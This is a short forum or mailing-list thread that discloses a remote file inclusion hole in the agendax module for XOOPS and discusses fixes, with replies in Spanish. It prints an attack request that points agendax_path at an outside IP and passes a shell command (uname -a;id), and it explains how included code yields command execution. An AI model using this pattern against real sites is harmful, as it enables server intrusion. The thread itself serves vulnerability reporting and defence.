I have XOOPS 2.0.5.1 installed, which comes with agendax version 1.2. The file addevent.inc.php from the agendax module has been requested directly the following way:

/modules/agendax//addevent.inc.php?agendax_path=http://200.00.27.52&cmd=uname%20-a;id

The first significant lines of code in the file are:

include($agendax_path."/checkemail.inc.php");
if ($addeventok == 1) # enabled ?
{
...

The file is intended to be only included from another file and the $agendax_path variable is expected to be defined, but it is not when this file is requested directly, allowing for an external inclusion. If malicious code (e.g. system($cmd)) is included, command injection is available.

Since, I don't know the code, I just closed the hole by exiting if REQUEST_URI matches /.inc.php/, but i'm sure there's a good way to solve this.

If you need more information, just mail me to quapropter at yahoo.com.ar. Hope this helps.

--
Guillermo Pereyra Irujo
Mar del Plata, Argentina

Hola Guillermo, yo me he encontrado con el mismo problema y además alguien ha utilizado esta vulnerabilidad para entrar comandos en el servidor, estamos trabajando para intentar solucionarlo y localizar otros módulos que puedan tener el mismo problema.
Tambien hemos informado al autor del módulo de este problema para ver si aporta alguna solución.
Si tienes novedades al respecto, te agradeceriamos que nos informes.

Seguimos....
M.

Esto es lo que me ha contestado el autor del módulo, espero que te sirva.

M.

Re: Command injection in agendax
This problem is resolved for next version and if you turn off register_global, this is not a problem.


wjue